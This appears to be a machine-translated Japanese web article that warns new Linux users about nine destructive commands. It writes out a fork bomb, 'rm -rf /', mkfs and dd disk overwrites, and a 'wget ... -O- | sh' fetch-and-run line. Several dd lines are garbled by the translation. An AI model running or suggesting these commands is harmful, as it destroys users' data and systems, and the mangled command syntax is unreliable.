ホームページ » デスクトップ » 注意すべき9つのLinuxコマンドとコード

    注意すべき9つのLinuxコマンドとコード

    Linuxのシェル/端末コマンドは非常に強力です そして、単純なコマンドを実行するだけで、フォルダ、ファイル、ルートフォルダなどを削除できます。.

    場合によっては、Linuxは確認を要求しないで、コマンドをすぐに実行して、 貴重なデータや情報を失う これらのファイルやフォルダに格納されている.

    人々がウェブにコンテンツを投稿するのは一般的です。 これらのコマンドを実行するように新しいLinuxユーザに勧める. これは、コンテンツを投稿した人にとっては冗談のように思えるかもしれませんが、反対側の人にとっては笑い事ではありません。.

    回避するのを助けるためにあなたのシステムにとって非常に有害ないくつかのLinuxコマンドを集めました。彼らは確かに危険であり、 新しいコマンドを作成するためにさまざまな方法で変更することさえ可能です。 より多くのダメージを与える.

    注意すべき重要なことは、 これらのコマンドのいくつかは、それらがUbuntuでsudoを前につけられている場合にのみ危険です。. Linuxの他のディストリビューションでは、これらの与えられたコマンドのほとんどはrootとして実行するのは危険です。.

    を見てください。 実行を避けるべき9つのコマンドとコード.

    1. Linux Fork Bombコマンド

    :():|:& ;: としても知られている フォークボム Linuxシステムに対するサービス拒否攻撃. :():|:& ;: bash関数です。実行後, システムがフリーズするまで、それは複数回繰り返されます.

    あなたはあなたのシステムを再起動することによってのみそれを取り除くことができます。だからあなたのLinuxシェルでこのコマンドを実行するときは注意してください.

    2. mv folder / dev / nullコマンド

    mvフォルダ/ dev / null 別の危険なコマンドです. Dev / null または nullデバイス です 書き込まれたすべてのデータを破棄しますが、書き込み操作が正常に実行されたことを報告するデバイスファイル. それはまたとして知られています 少し座屈 または ブラックホール.

    3. rm -rfコマンド

    rm-rf コマンドは高速な方法です。 フォルダとその内容を削除する Linuxオペレーティングシステムで。使い方がわからなければ、システムにとって非常に危険になる可能性があります。 rm-rfコマンドで使用される最も一般的な組み合わせとオプションは以下のとおりです。

    • RM コマンドは、Linuxシステム内のファイルを削除するために使用されます.
    • rm -f コマンドを実行せずに、フォルダ内の読み取り専用ファイルを削除します。.
    • rm -r コマンドはフォルダーの内容を再帰的に削除します.
    • rm -d コマンドは空のディレクトリを削除するために使用されますが、それが空でない場合ディレクトリの削除を拒否します.
    • rm -rf / ルートディレクトリおよびサブフォルダ内のすべてのコンテンツの強制削除(書き込み保護されている場合でも削除)にはcommandが使用されます。.
    • rm -rf * 現在のディレクトリ(現在作業中のディレクトリ)およびサブフォルダ内のすべてのコンテンツを強制的に削除するためのコマンド.
    • rm-rf. 現在のフォルダとサブフォルダ内のすべてのコンテンツを強制的に削除するには、commandを使用します。の rm -r。[^。] * コマンドも使用可能.
    • rm -i コマンドはファイルやフォルダの削除に使用されますが、削除の前にプロンプ​​トが表示されます。.

    4. mkfsコマンド

    mkfs 目的がわからない場合、Linuxベースのシステムにとって危険なコマンドになる可能性があります。. mkfsの後に書かれたものはすべてフォーマットされ、空のLinuxファイルシステムに置き換えられます。.

    下記のコマンドはすべてハードドライブをフォーマットします。管理者権限が必要です。

    • mkfs
    • mkfs.ext3
    • mkfs.bfs
    • mkfs.ext2
    • mkfs.minix
    • mkfs.msdos
    • mkfs.reiserfs
    • mkfs.vfat

    コマンド mkfs.cramfs 上記と同じことをしますが、実行に管理者権限は必要ありません。.

    5.タールボム

    タール コマンドは、複数のファイルを単一のファイル(アーカイブファイル)に結合するために使用されます。 .タール フォーマット。このコマンドでテープアーカイブ(Tar)爆弾を作成できます。.

    それは 現在のディレクトリに既存のファイルと同様の名前を持つ数千から数百万のファイルに展開されるアーカイブファイル 展開したときに新しいディレクトリに移動するのではなく.

    あなたはタール爆弾の犠牲者になることを避けることができます tarファイルを受け取ったら、常に新しい保護ディレクトリを作成します。 そして、受信前のtarファイルをこのディレクトリに移動して、展開を解除します。.

    tarファイルが本当にtar爆弾であるなら、あなたはそれを取り除くために新しく作成されたディレクトリを単に削除することができます。タールボムの爆発を避けるためのもう一つの方法は、 -トン tarファイルのすべての内容を一覧表示するオプション tarファイルに含まれているコンテンツの種類を把握するため.

    6. ddコマンド

    dd コマンドを使用して ハードディスクパーティションのコピーと変換. しかし、間違った目的地を指定した場合、それは有害であることが判明する可能性があります。.

    コマンドは次のいずれかです。

    • dd if = / dev / hda / = / dev / hdb
    • dd if = / dev / hda / = / dev / sdb
    • dd if = = / dev / hdaの何か
    • dd if = = / dev / sdaの何か

    次のコマンドは、プライマリハードドライブ全体を消去します。 dd if = / dev / zero / = / dev /を持っていた

    7.シェルスクリプトコード

    誰かがあなたを犠牲にするかもしれません シェルスクリプトへのリンクを提供し、それをダウンロードして実行することを支持します. スクリプトの内部には悪意のあるまたは危険なコードが含まれている可能性があります。の コマンドの形式 このように見えるかもしれません: wget http:// some_malicious_source -O- | sh. の wget shがスクリプトの実行をダウンロードしている間にスクリプトをダウンロードします.

    8.悪意のあるソースコード

    誰かがあなたにソースコードを渡し、それをコンパイルするように頼みます。コード 通常のコードのように見えるかもしれませんが、実際には大きなソースコードに偽装されたコードが偽装されています。 システムに害を及ぼす可能性があります。この種の攻撃による被害を受けないようにする, 信頼できるソースからのみソースコードを受け入れてコンパイルする.

    9.減圧爆弾

    あなたは圧縮ファイルを受け取ったので、あなたはこのファイルを抽出するように頼まれます。実際には, この小さなサイズの圧縮ファイルは非常に高度に圧縮されたデータを含みます.

    ファイルが解凍されると、数百GBのデータが抽出されます。 ハードドライブをいっぱいにすることができます システムのパフォーマンスを低下させるため。このような状況を避けるために、信頼できる情報源からのデータを常に受け​​入れるようにしてください。.